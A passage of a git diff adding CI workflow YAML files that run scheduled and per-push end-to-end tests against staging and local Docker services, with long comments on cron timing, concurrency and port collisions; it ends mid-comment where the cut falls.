+# +# Cadence: every 20 min (3x/hour). The script is conservatively +# bounded at 10 min wall-clock; even on degraded staging it should +# finish before the next firing. cron-overlap is guarded by the +# concurrency group below. +# +# Cost: ~3 runs/hour × 5-10 min × $0.008/min GHA = ~$0.50-$1/day. +# Plus a fresh tenant provisioned + torn down each run (Railway + +# AWS pennies). Negligible. +# +# Failure handling: when the run fails, the workflow exits non-zero +# and GitHub's standard email/notification path fires. Operators +# can subscribe to this workflow's failure channel for paging-grade +# alerting. + +on: + schedule: + # Every 10 minutes, on :02 :12 :22 :32 :42 :52. Three constraints: + # 1. Stay off the top-of-hour. GitHub Actions scheduler drops + # :00 firings under high load (own docs: + # https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#schedule). + # Prior history: cron was '0,20,40' (2026-05-02) — only :00 + # ever survived. Bumped to '10,30,50' (2026-05-03) on the + # theory that further-from-:00 wins. Empirically 2026-05-04 + # that ALSO dropped to ~60 min effective cadence (only ~1 + # schedule fire per hour — see molecule-core#2726). Detection + # latency was claimed 20 min, actual 60 min. + # 2. Avoid colliding with the existing :15 sweep-cf-orphans + # and :45 sweep-cf-tunnels — both hit the CF API and we + # don't want to fight for rate-limit tokens. + # 3. Avoid the :30 heavy slot (canary-staging /30, sweep-aws- + # secrets, sweep-stale-e2e-orgs every :15) — multiple + # overlapping cron registrations on the same minute is part + # of what GH drops under load. + # Solution: bump fires-per-hour 3 → 6 AND keep all slots in clean + # lanes (1-3 min away from any other cron). Even with empirically- + # observed ~67% GH drop ratio, 6 attempts/hour yields ~2 effective + # fires = ~30 min cadence; closer to the 20-min target than the + # current shape and provides a real degradation alarm if drops + # get worse. + - cron: '2,12,22,32,42,52 * * * *' +permissions: + contents: read + # No issue-write here — failures surface as red runs in the workflow + # history. If you want auto-issue-on-fail, add a follow-up step that + # uses gh issue create gated on `if: failure()`. Keeping the surface + # minimal until that's actually wanted. + +# Serialize so two firings can never overlap. Cron firing every 20 min +# but scripts conservatively bounded at 10 min — overlap shouldn't +# happen in steady state, but if a run hangs we don't want N more +# stacking up. +concurrency: + group: continuous-synth-e2e + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + synth: + name: Synthetic E2E against staging + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + # Bumped from 12 → 20 (2026-05-04). Tenant user-data install phase + # (apt-get update + install docker.io/jq/awscli/caddy + snap install + # ssm-agent) runs from raw Ubuntu on every boot — none of it is + # pre-baked into the tenant AMI. Empirical fetch_secrets/ok timing + # across today's canaries: 51s → 82s → 143s → 625s. apt-mirror tail + # latency drives the boot-to-fetch_secrets phase from ~1min to >10min. + # A 12min budget leaves only ~2min for the workspace (which needs + # ~3.5min for claude-code cold boot) on slow-apt days, blowing the + # budget. 20min absorbs the worst tenant tail so the workspace probe + # gets the full ~7min it needs even on a slow apt day. 
Real fix: + # pre-bake caddy + ssm-agent into the tenant AMI (controlplane#TBD). + timeout-minutes: 20 + env: + # claude-code default: cold-start ~5 min (comparable to langgraph), + # but uses MiniMax-M2.7-highspeed via the template's third-party- + # Anthropic-compat path (workspace-configs-templates/claude-code- + # default/config.yaml:64-69). MiniMax is ~5-10x cheaper than + # gpt-4.1-mini per token AND avoids the recurring OpenAI quota- + # exhaustion class that took the canary down 2026-05-03 (#265). + # Operators can pick langgraph / hermes via workflow_dispatch + # when they specifically need to exercise the OpenAI or SDK- + # native paths. + E2E_RUNTIME: ${{ github.event.inputs.runtime || 'claude-code' }} + # Pin the canary to a specific MiniMax model rather than relying + # on the per-runtime default ("sonnet" → routes to direct + # Anthropic, defeats the cost saving). Operators can override + # via workflow_dispatch by setting a different E2E_MODEL_SLUG + # input if they need to exercise a specific model. M2.7-highspeed + # is "Token Plan only" but cheap-per-token and fast. + E2E_MODEL_SLUG: ${{ github.event.inputs.model_slug || 'MiniMax-M2.7-highspeed' }} + # Bound to 10 min so a stuck provision fails the run instead of + # holding up the next cron firing. 15-min default in the script + # is for the on-PR full lifecycle where we have more headroom. + E2E_PROVISION_TIMEOUT_SECS: '600' + # Slug suffix — namespaced "synth-" so these runs are + # distinguishable from PR-driven runs in CP admin. + E2E_RUN_ID: synth-${{ github.run_id }} + # Forced false for cron; respected for manual dispatch + E2E_KEEP_ORG: ${{ github.event.inputs.keep_org == 'true' && '1' || '' }} + MOLECULE_CP_URL: ${{ vars.STAGING_CP_URL || 'https://staging-api.moleculesai.app' }} + MOLECULE_ADMIN_TOKEN: ${{ secrets.CP_STAGING_ADMIN_API_TOKEN }} + # MiniMax key is the canary's PRIMARY auth path. claude-code + # template's `minimax` provider routes ANTHROPIC_BASE_URL to + # api.minimax.io/anthropic and reads MINIMAX_API_KEY at boot. + # tests/e2e/test_staging_full_saas.sh branches SECRETS_JSON on + # which key is present — MiniMax wins when set. + E2E_MINIMAX_API_KEY: ${{ secrets.MOLECULE_STAGING_MINIMAX_API_KEY }} + # Direct-Anthropic alternative for operators who don't want to + # set up a MiniMax account (priority below MiniMax — first + # non-empty wins in test_staging_full_saas.sh's secrets-injection + # block). See #2578 PR comment for the rationale. + E2E_ANTHROPIC_API_KEY: ${{ secrets.MOLECULE_STAGING_ANTHROPIC_API_KEY }} + # OpenAI fallback — kept wired so operators can dispatch with + # E2E_RUNTIME=langgraph or =hermes and still have a working + # canary path. The script picks the right blob shape based on + # which key is non-empty. + E2E_OPENAI_API_KEY: ${{ secrets.MOLECULE_STAGING_OPENAI_KEY }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify required secrets present + run: | + # Hard-fail on missing secret REGARDLESS of trigger. Previously + # this step soft-skipped on workflow_dispatch via `exit 0`, but + # `exit 0` only ends the STEP — subsequent steps still ran with + # the empty secret, the synth script fell through to the wrong + # SECRETS_JSON branch, and the canary failed 5 min later with a + # confusing "Agent error (Exception)" instead of the clean + # "secret missing" message at the top. 
Caught 2026-05-04 by + # dispatched run 25296530706: claude-code + missing MINIMAX + # silently used OpenAI keys but kept model=MiniMax-M2.7, then + # the workspace 401'd against MiniMax once it tried to call. + # Fix: exit 1 in both cron and dispatch paths. Operators who + # want to verify a YAML change without setting up the secret + # can read the verify-secrets step's stderr — the failure is + # itself the verification signal. + if [ -z "${MOLECULE_ADMIN_TOKEN:-}" ]; then + echo "::error::CP_STAGING_ADMIN_API_TOKEN secret missing — synth E2E cannot run" + echo "::error::Set it at Settings → Secrets and Variables → Actions; pull from staging-CP's CP_ADMIN_API_TOKEN env in Railway." + exit 1 + fi + + # LLM-key requirement is per-runtime: claude-code accepts + # EITHER MiniMax OR direct-Anthropic (whichever is set first), + # langgraph + hermes use OpenAI (MOLECULE_STAGING_OPENAI_KEY). + case "${E2E_RUNTIME}" in + claude-code) + if [ -n "${E2E_MINIMAX_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY" + required_secret_value="${E2E_MINIMAX_API_KEY}" + elif [ -n "${E2E_ANTHROPIC_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="${E2E_ANTHROPIC_API_KEY}" + else + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY or MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="" + fi + ;; + langgraph|hermes) + required_secret_name="MOLECULE_STAGING_OPENAI_KEY" + required_secret_value="${E2E_OPENAI_API_KEY:-}" + ;; + *) + echo "::warning::Unknown E2E_RUNTIME='${E2E_RUNTIME}' — skipping LLM-key check" + required_secret_name="" + required_secret_value="present" + ;; + esac + if [ -n "$required_secret_name" ] && [ -z "$required_secret_value" ]; then + echo "::error::${required_secret_name} secret missing — runtime=${E2E_RUNTIME} cannot authenticate against its LLM provider" + echo "::error::Set it at Settings → Secrets and Variables → Actions, OR dispatch with a different runtime" + exit 1 + fi + + - name: Install required tools + run: | + # The script depends on jq + curl (already on ubuntu-latest) + # and python3 (likewise). Verify they're all present so we + # fail fast on a runner image regression rather than mid-script. + for cmd in jq curl python3; do + command -v "$cmd" >/dev/null 2>&1 || { + echo "::error::required tool '$cmd' not on PATH — runner image regression?" + exit 1 + } + done + + - name: Run synthetic E2E + # The script handles its own teardown via EXIT trap; even on + # failure (timeout, assertion), the org is deprovisioned and + # leaks are reported. Exit code propagates from the script. + run: | + bash tests/e2e/test_staging_full_saas.sh + + - name: Failure summary + # Runs only on failure. Adds a job summary so the workflow run + # page shows a quick "what happened" instead of forcing readers + # to scroll through script output. + if: failure() + run: | + { + echo "## Continuous synth E2E failed" + echo "" + echo "**Run ID:** ${{ github.run_id }}" + echo "**Trigger:** ${{ github.event_name }}" + echo "**Runtime:** ${E2E_RUNTIME}" + echo "**Slug:** synth-${{ github.run_id }}" + echo "" + echo "### What this means" + echo "" + echo "Staging just regressed on a path that previously worked. 
Likely classes:" + echo "- Schema mismatch between sender and receiver (#2345 class)" + echo "- Deployment-pipeline gap (RFC #2312 / staging-tenant-image-stale class)" + echo "- Vendor outage (Cloudflare, Railway, AWS, GHCR)" + echo "- Staging-CP env var rotation" + echo "" + echo "### Next steps" + echo "" + echo "1. Check the script output above for the assertion that failed" + echo "2. If it's a vendor outage, no action needed — next firing in ~20 min" + echo "3. If it's a code regression, find the causing PR via \`git log\` against last green run and revert/fix" + echo "4. Keep an eye on the next 1-2 firings — flake vs persistent fail differs in priority" + } >> "$GITHUB_STEP_SUMMARY" diff --git a/.gitea/workflows/e2e-api.yml b/.gitea/workflows/e2e-api.yml new file mode 100644 index 00000000..6f82e080 --- /dev/null +++ b/.gitea/workflows/e2e-api.yml @@ -0,0 +1,333 @@ +name: E2E API Smoke Test + +# Ported from .github/workflows/e2e-api.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# +# Extracted from ci.yml so workflow-level concurrency can protect this job +# from run-level cancellation (issue #458). +# +# Trigger model (revised 2026-04-29): +# +# Always FIRES on push/pull_request to staging+main. Real work is gated +# per-step on `needs.detect-changes.outputs.api` — when paths under +# `workspace-server/`, `tests/e2e/`, or this workflow file haven't +# changed, the no-op step alone runs and emits SUCCESS for the +# `E2E API Smoke Test` check, satisfying branch protection without +# spending CI cycles. See the in-job comment on the `e2e-api` job for +# why this is one job (not two-jobs-sharing-name) and the 2026-04-29 +# PR #2264 incident that drove the consolidation. +# +# Parallel-safety (Class B Hongming-owned CICD red sweep, 2026-05-08) +# ------------------------------------------------------------------- +# Same substrate hazard as PR #98 (handlers-postgres-integration). Our +# Gitea act_runner runs with `container.network: host` (operator host +# `/opt/molecule/runners/config.yaml`), which means: +# +# * Two concurrent runs both try to bind their `-p 15432:5432` / +# `-p 16379:6379` host ports — the second postgres/redis FATALs +# with `Address in use` and `docker run` returns exit 125 with +# `Conflict. The container name "/molecule-ci-postgres" is already +# in use by container ...`. Verified in run a7/2727 on 2026-05-07. +# * The fixed container names `molecule-ci-postgres` / `-redis` (the +# pre-fix shape) collide on name AS WELL AS port. The cleanup-with- +# `docker rm -f` at the start of the second job KILLS the first +# job's still-running postgres/redis. +# +# Fix shape (mirrors PR #98's bridge-net pattern, adapted because +# platform-server is a Go binary on the host, not a containerised +# step): +# +# 1. Unique container names per run: +# pg-e2e-api-${RUN_ID}-${RUN_ATTEMPT} +# redis-e2e-api-${RUN_ID}-${RUN_ATTEMPT} +# `${RUN_ID}-${RUN_ATTEMPT}` is unique even across reruns of the +# same run_id. +# 2. 
Ephemeral host port per run (`-p 0:5432`), then read the actual +# bound port via `docker port` and export DATABASE_URL/REDIS_URL +# pointing at it. No fixed host-port → no port collision. +# 3. `127.0.0.1` (NOT `localhost`) in URLs — IPv6 first-resolve was +# the original flake fixed in #92 and the script's still IPv6- +# enabled. +# 4. `if: always()` cleanup so containers don't leak when test steps +# fail. +# +# Issue #94 items #2 + #3 (also fixed here): +# * Pre-pull `alpine:latest` so the platform-server's provisioner +# (`internal/handlers/container_files.go`) can stand up its +# ephemeral token-write helper without a daemon.io round-trip. +# * Create `molecule-core-net` bridge network if missing so the +# provisioner's container.HostConfig {NetworkMode: ...} attach +# succeeds. +# Item #1 (timeouts) — evidence on recent runs (77/3191, ae/4270, 0e/ +# 2318) shows Postgres ready in 3s, Redis in 1s, Platform in 1s when +# they DO come up. Timeouts are not the bottleneck; not bumped. +# +# Item explicitly NOT fixed here: failing test `Status back online` +# fails because the platform's langgraph workspace template image +# (ghcr.io/molecule-ai/workspace-template-langgraph:latest) returns +# 403 Forbidden post-2026-05-06 GitHub org suspension. That is a +# template-registry resolution issue (ADR-002 / local-build mode) and +# belongs in a separate change that touches workspace-server, not +# this workflow file. + +on: + push: + branches: [main, staging] + pull_request: + branches: [main, staging] +concurrency: + # Per-SHA grouping (changed 2026-04-28 from per-ref). Per-ref had the + # same auto-promote-staging brittleness as e2e-staging-canvas — back- + # to-back staging pushes share refs/heads/staging, so the older push's + # queued run gets cancelled when a newer push lands. Auto-promote- + # staging then sees `completed/cancelled` for the older SHA and stays + # put; the newer SHA's gates may eventually save the day, but if the + # newer push gets cancelled too, we deadlock. + # + # See e2e-staging-canvas.yml's identical concurrency block for the full + # rationale and the 2026-04-28 incident reference. + group: e2e-api-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + api: ${{ steps.decide.outputs.api }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + fetch-depth: 0 + - id: decide + # Inline replacement for dorny/paths-filter — same pattern PR#372's + # ci.yml port used. Diffs against the PR base or push BEFORE SHA, + # then matches against the api-relevant path set. + run: | + BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + fi + if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$'; then + echo "api=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + git fetch --depth=1 origin "$BASE" 2>/dev/null || true + fi + if ! 
git cat-file -e "$BASE" 2>/dev/null; then + echo "api=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + CHANGED=$(git diff --name-only "$BASE" HEAD) + if echo "$CHANGED" | grep -qE '^(workspace-server/|tests/e2e/|\.gitea/workflows/e2e-api\.yml$)'; then + echo "api=true" >> "$GITHUB_OUTPUT" + else + echo "api=false" >> "$GITHUB_OUTPUT" + fi + + # ONE job (no job-level `if:`) that always runs and reports under the + # required-check name `E2E API Smoke Test`. Real work is gated per-step + # on `needs.detect-changes.outputs.api`. Reason: GitHub registers a + # check run for every job that matches `name:`, and a job-level + # `if: false` produces a SKIPPED check run. Branch protection treats + # all check runs with a matching context name on the latest commit as a + # SET — any SKIPPED in the set fails the required-check eval, even with + # SUCCESS siblings. Verified 2026-04-29 on PR #2264 (staging→main): + # 4 check runs (2 SKIPPED + 2 SUCCESS) at the head SHA blocked + # promotion despite all real work succeeding. Collapsing to a single + # always-running job with conditional steps emits exactly one SUCCESS + # check run regardless of paths filter — branch-protection-clean. + e2e-api: + needs: detect-changes + name: E2E API Smoke Test + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 15 + env: + # Unique per-run container names so concurrent runs on the host- + # network act_runner don't collide on name OR port. + # `${RUN_ID}-${RUN_ATTEMPT}` stays unique across reruns of the + # same run_id. PORT is set later (after docker port lookup) since + # we let Docker assign an ephemeral host port. + PG_CONTAINER: pg-e2e-api-${{ github.run_id }}-${{ github.run_attempt }} + REDIS_CONTAINER: redis-e2e-api-${{ github.run_id }}-${{ github.run_attempt }} + PORT: "8080" + steps: + - name: No-op pass (paths filter excluded this commit) + if: needs.detect-changes.outputs.api != 'true' + run: | + echo "No workspace-server / tests/e2e / workflow changes — E2E API gate satisfied without running tests." + echo "::notice::E2E API Smoke Test no-op pass (paths filter excluded this commit)." + - if: needs.detect-changes.outputs.api == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + - if: needs.detect-changes.outputs.api == 'true' + uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5 + with: + go-version: 'stable' + cache: true + cache-dependency-path: workspace-server/go.sum + - name: Pre-pull alpine + ensure provisioner network (Issue #94 items #2 + #3) + if: needs.detect-changes.outputs.api == 'true' + run: | + # Provisioner uses alpine:latest for ephemeral token-write + # containers (workspace-server/internal/handlers/container_files.go). + # Pre-pull so the first provision in test_api.sh doesn't race + # the daemon's pull cache. Idempotent — `docker pull` is a no-op + # when the image is already present. + docker pull alpine:latest >/dev/null + # Provisioner attaches workspace containers to + # molecule-core-net (workspace-server/internal/provisioner/ + # provisioner.go::DefaultNetwork). The bridge already exists on + # the operator host's docker daemon — `network create` is + # idempotent via `|| true`. + docker network create molecule-core-net >/dev/null 2>&1 || true + echo "alpine:latest pre-pulled; molecule-core-net ensured." 
+ - name: Start Postgres (docker) + if: needs.detect-changes.outputs.api == 'true' + run: | + # Defensive cleanup — only matches THIS run's container name, + # so it cannot kill a sibling run's postgres. (Pre-fix the + # name was static and this rm hit other runs' containers.) + docker rm -f "$PG_CONTAINER" 2>/dev/null || true + # `-p 0:5432` requests an ephemeral host port; we read it back + # below and export DATABASE_URL. + docker run -d --name "$PG_CONTAINER" \ + -e POSTGRES_USER=dev -e POSTGRES_PASSWORD=dev -e POSTGRES_DB=molecule \ + -p 0:5432 postgres:16 >/dev/null + # Resolve the host-side port assignment. `docker port` prints + # `0.0.0.0:NNNN` (and on host-net runners may also print an + # IPv6 line — take the first IPv4 line). + PG_PORT=$(docker port "$PG_CONTAINER" 5432/tcp | awk -F: '/^0\.0\.0\.0:/ {print $2; exit}') + if [ -z "$PG_PORT" ]; then + # Fallback: any first line. Some Docker versions print only + # one line. + PG_PORT=$(docker port "$PG_CONTAINER" 5432/tcp | head -1 | awk -F: '{print $NF}') + fi + if [ -z "$PG_PORT" ]; then + echo "::error::Could not resolve host port for $PG_CONTAINER" + docker port "$PG_CONTAINER" 5432/tcp || true + docker logs "$PG_CONTAINER" || true + exit 1 + fi + # 127.0.0.1 (NOT localhost) — IPv6 first-resolve flake (#92). + echo "PG_PORT=${PG_PORT}" >> "$GITHUB_ENV" + echo "DATABASE_URL=postgres://dev:dev@127.0.0.1:${PG_PORT}/molecule?sslmode=disable" >> "$GITHUB_ENV" + echo "Postgres host port: ${PG_PORT}" + for i in $(seq 1 30); do + if docker exec "$PG_CONTAINER" pg_isready -U dev >/dev/null 2>&1; then + echo "Postgres ready after ${i}s" + exit 0 + fi + sleep 1 + done + echo "::error::Postgres did not become ready in 30s" + docker logs "$PG_CONTAINER" || true + exit 1 + - name: Start Redis (docker) + if: needs.detect-changes.outputs.api == 'true' + run: | + docker rm -f "$REDIS_CONTAINER" 2>/dev/null || true + docker run -d --name "$REDIS_CONTAINER" -p 0:6379 redis:7 >/dev/null + REDIS_PORT=$(docker port "$REDIS_CONTAINER" 6379/tcp | awk -F: '/^0\.0\.0\.0:/ {print $2; exit}') + if [ -z "$REDIS_PORT" ]; then + REDIS_PORT=$(docker port "$REDIS_CONTAINER" 6379/tcp | head -1 | awk -F: '{print $NF}') + fi + if [ -z "$REDIS_PORT" ]; then + echo "::error::Could not resolve host port for $REDIS_CONTAINER" + docker port "$REDIS_CONTAINER" 6379/tcp || true + docker logs "$REDIS_CONTAINER" || true + exit 1 + fi + echo "REDIS_PORT=${REDIS_PORT}" >> "$GITHUB_ENV" + echo "REDIS_URL=redis://127.0.0.1:${REDIS_PORT}" >> "$GITHUB_ENV" + echo "Redis host port: ${REDIS_PORT}" + for i in $(seq 1 15); do + if docker exec "$REDIS_CONTAINER" redis-cli ping 2>/dev/null | grep -q PONG; then + echo "Redis ready after ${i}s" + exit 0 + fi + sleep 1 + done + echo "::error::Redis did not become ready in 15s" + docker logs "$REDIS_CONTAINER" || true + exit 1 + - name: Build platform + if: needs.detect-changes.outputs.api == 'true' + working-directory: workspace-server + run: go build -o platform-server ./cmd/server + - name: Start platform (background) + if: needs.detect-changes.outputs.api == 'true' + working-directory: workspace-server + run: | + # DATABASE_URL + REDIS_URL exported by the start-postgres / + # start-redis steps point at this run's per-run host ports. + ./platform-server > platform.log 2>&1 & + echo $! 
> platform.pid + - name: Wait for /health + if: needs.detect-changes.outputs.api == 'true' + run: | + for i in $(seq 1 30); do + if curl -sf http://127.0.0.1:8080/health > /dev/null; then + echo "Platform up after ${i}s" + exit 0 + fi + sleep 1 + done + echo "::error::Platform did not become healthy in 30s" + cat workspace-server/platform.log || true + exit 1 + - name: Assert migrations applied + if: needs.detect-changes.outputs.api == 'true' + run: | + tables=$(docker exec "$PG_CONTAINER" psql -U dev -d molecule -tAc "SELECT count(*) FROM information_schema.tables WHERE table_schema='public' AND table_name='workspaces'") + if [ "$tables" != "1" ]; then + echo "::error::Migrations did not apply" + cat workspace-server/platform.log || true + exit 1 + fi + echo "Migrations OK" + - name: Run E2E API tests + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_api.sh + - name: Run notify-with-attachments E2E + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_notify_attachments_e2e.sh + - name: Run priority-runtimes E2E (claude-code + hermes — skips when keys absent) + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_priority_runtimes_e2e.sh + - name: Run poll-mode + since_id cursor E2E (#2339) + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_poll_mode_e2e.sh + - name: Run poll-mode chat upload E2E (RFC #2891) + if: needs.detect-changes.outputs.api == 'true' + run: bash tests/e2e/test_poll_mode_chat_upload_e2e.sh + - name: Dump platform log on failure + if: failure() && needs.detect-changes.outputs.api == 'true' + run: cat workspace-server/platform.log || true + - name: Stop platform + if: always() && needs.detect-changes.outputs.api == 'true' + run: | + if [ -f workspace-server/platform.pid ]; then + kill "$(cat workspace-server/platform.pid)" 2>/dev/null || true + fi + - name: Stop service containers + # always() so containers don't leak when test steps fail. The + # cleanup is best-effort: if the container is already gone + # (e.g. concurrent rerun race), don't fail the job. + if: always() && needs.detect-changes.outputs.api == 'true' + run: | + docker rm -f "$PG_CONTAINER" 2>/dev/null || true + docker rm -f "$REDIS_CONTAINER" 2>/dev/null || true diff --git a/.gitea/workflows/e2e-staging-canvas.yml b/.gitea/workflows/e2e-staging-canvas.yml new file mode 100644 index 00000000..93eb685e --- /dev/null +++ b/.gitea/workflows/e2e-staging-canvas.yml @@ -0,0 +1,247 @@ +name: E2E Staging Canvas (Playwright) + +# Ported from .github/workflows/e2e-staging-canvas.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Playwright test suite that provisions a fresh staging org per run and +# verifies every workspace-panel tab renders without crashing. Complements +# e2e-staging-saas.yml (which tests the API shape) by exercising the +# actual browser + canvas bundle against live staging. +# +# Triggers: push to main/staging or PR touching canvas sources + this workflow, +# manual dispatch, and weekly cron to catch browser/runtime drift even +# when canvas is quiet. 
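+#
+# Worked example of how the per-SHA concurrency group further down resolves
+# (values are made up, and this assumes Gitea Actions evaluates these
+# expressions the same way GitHub does):
+#
+#   group: e2e-staging-canvas-${{ github.event.pull_request.head.sha || github.sha }}
+#   pull_request event, head sha abc123  ->  e2e-staging-canvas-abc123
+#   push / schedule event (no PR head)   ->  falls back to github.sha,
+#                                            e.g. e2e-staging-canvas-3f99fede
+#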
+# Added staging to push/pull_request branches so the auto-promote gate +# check (--event push --branch staging) can see a completed run for this +# workflow — mirrors what PR #1891 does for e2e-api.yml. + +on: + # Trigger model (revised 2026-04-29): + # + # Always fires on push/pull_request; real work is gated per-step on + # `needs.detect-changes.outputs.canvas`. When canvas/ paths haven't + # changed, the no-op step alone runs and emits SUCCESS for the + # `Canvas tabs E2E` check, satisfying branch protection without + # spending CI cycles. See e2e-api.yml for the rationale on why this + # is a single job rather than two-jobs-sharing-name. + push: + branches: [main] + pull_request: + branches: [main] + schedule: + # Weekly on Sunday 08:00 UTC — catches Chrome / Playwright / Next.js + # release-note-shaped regressions that don't ride in with a PR. + - cron: '0 8 * * 0' + +concurrency: + # Per-SHA grouping (changed 2026-04-28 from a single global group). The + # global group made auto-promote-staging brittle: when a staging push + # queued behind an in-flight run and a third entrant (a PR run, a + # follow-on push) entered the group, the staging push got cancelled — + # leaving auto-promote-staging looking at `completed/cancelled` for a + # required gate and refusing to advance main. Observed 2026-04-28 + # 23:51-23:53 on staging tip 3f99fede. + # + # The original intent of the global group was to throttle parallel + # E2E provisions (each spins a fresh EC2). At our scale that throttle + # isn't worth the correctness cost — fresh-org-per-run isolates the + # state, and the cost of two parallel runs (~$0.001/min × 10min × 2) + # is rounding error vs. the cost of a stuck pipeline. + # + # Per-SHA still dedupes accidental double-triggers for the SAME SHA. + # It does NOT cancel obsolete-PR-version runs on force-push; that + # wasted CI is acceptable given the alternative is losing staging-tip + # data that auto-promote-staging needs. + group: e2e-staging-canvas-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + canvas: ${{ steps.decide.outputs.canvas }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + fetch-depth: 0 + - id: decide + # Inline replacement for dorny/paths-filter — see e2e-api.yml. + # Cron triggers always run real work (no diff context). + run: | + if [ "${{ github.event_name }}" = "schedule" ]; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + fi + if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$'; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + git fetch --depth=1 origin "$BASE" 2>/dev/null || true + fi + if ! 
git cat-file -e "$BASE" 2>/dev/null; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + CHANGED=$(git diff --name-only "$BASE" HEAD) + if echo "$CHANGED" | grep -qE '^(canvas/|\.gitea/workflows/e2e-staging-canvas\.yml$)'; then + echo "canvas=true" >> "$GITHUB_OUTPUT" + else + echo "canvas=false" >> "$GITHUB_OUTPUT" + fi + + # ONE job (no job-level `if:`) that always runs and reports under the + # required-check name `Canvas tabs E2E`. Real work is gated per-step on + # `needs.detect-changes.outputs.canvas`. See e2e-api.yml for the full + # rationale — same path-filter check-name parity issue blocked PR #2264 + # (staging→main) on 2026-04-29 because branch protection treats matching- + # name check runs as a SET, and any SKIPPED member fails the eval. + playwright: + needs: detect-changes + name: Canvas tabs E2E + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 40 + + env: + CANVAS_E2E_STAGING: '1' + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + + defaults: + run: + working-directory: canvas + + steps: + - name: No-op pass (paths filter excluded this commit) + if: needs.detect-changes.outputs.canvas != 'true' + working-directory: . + run: | + echo "No canvas / workflow changes — E2E Staging Canvas gate satisfied without running tests." + echo "::notice::E2E Staging Canvas no-op pass (paths filter excluded this commit)." + + - if: needs.detect-changes.outputs.canvas == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + if: needs.detect-changes.outputs.canvas == 'true' + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::Missing MOLECULE_STAGING_ADMIN_TOKEN" + exit 2 + fi + + - name: Set up Node + if: needs.detect-changes.outputs.canvas == 'true' + uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6.4.0 + with: + node-version: '20' + cache: 'npm' + cache-dependency-path: canvas/package-lock.json + + - name: Install canvas deps + if: needs.detect-changes.outputs.canvas == 'true' + run: npm ci + + - name: Install Playwright browsers + if: needs.detect-changes.outputs.canvas == 'true' + run: npx playwright install --with-deps chromium + + - name: Run staging canvas E2E + if: needs.detect-changes.outputs.canvas == 'true' + run: npx playwright test --config=playwright.staging.config.ts + + - name: Upload Playwright report on failure + if: failure() && needs.detect-changes.outputs.canvas == 'true' + # Pinned to v3 for Gitea act_runner v0.6 compatibility — v4+ uses + # the GHES 3.10+ artifact protocol that Gitea 1.22.x does 